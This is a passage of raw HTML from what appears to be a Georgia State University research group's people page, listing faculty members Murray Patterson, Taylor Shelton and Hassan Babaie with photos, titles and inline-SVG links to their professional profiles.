style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c52-outer\">\n            <div data-colibri-id=\"182-c52\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c52 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c53\" class=\"d-block style-973 style-local-182-c53 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Taylor-shelton_300x300-e1697143561739.jpeg\" class=\"wp-image-1681 style-973-image style-local-182-c53-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c53-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c54\" class=\"h-global-transition-all h-heading style-974 style-local-182-c54 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c54\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Taylor Shelton</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c55\" class=\"h-text h-text-component style-975 style-local-182-c55 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\">Assistant Professor</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c56\" class=\"h-text h-text-component style-976 style-local-182-c56 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c57\" class=\"style-977 style-local-182-c57 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/taylor-shelton-28a4b3291\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c58-outer\">\n            <div data-colibri-id=\"182-c58\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c58 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c59\" class=\"d-block style-973 style-local-182-c59 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-Hassan-Babaie-300x300-1-e1697143646400.jpg\" class=\"wp-image-1682 style-973-image style-local-182-c59-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c59-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c60\" class=\"h-global-transition-all h-heading style-974 style-local-182-c60 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c60\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Hassan Babaie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c61\" class=\"h-text h-text-component style-975 style-local-182-c61 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c62\" class=\"h-text h-text-component style-976 style-local-182-c62 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c63\" class=\"style-977 style-local-182-c63 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://geosciences.gsu.edu/profile/hassan-babaie/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Hassan-Babaie/4\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 